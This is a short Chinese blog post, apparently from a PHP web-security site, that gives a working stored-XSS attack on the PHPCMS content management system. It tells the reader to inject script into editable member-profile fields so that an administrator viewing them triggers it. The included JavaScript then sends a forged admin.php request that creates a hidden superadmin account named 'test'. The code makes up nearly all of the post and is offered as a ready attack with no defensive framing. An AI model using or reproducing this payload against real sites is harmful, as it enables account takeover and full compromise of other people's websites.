|
再会员中心随处修改资料,写入xss代码。诱发管理后台点击
function ajax(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
var _x = ajax();
adduser();
function adduser() {
src="admin.php?mod=phpcms&file=admin&action=add"; data="admin%5Busername%5D=test&admin%5Balloweditpassword%5D=1&roleids%5B%5D=1&admin%5Bdisabled%5D=0&dosubmit=+%C8%B7%B6%A8+";
xhr_act("POST",src,data);
}
function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
后台会自动加一个用户test的超级管理员 |
-
上一篇: 上传漏洞科普[1]-文件上传表单是Web安全主要威胁
下一篇: 360shop官网post注入一枚 - 网站安全 - 自学php
还没有人抢沙发呢~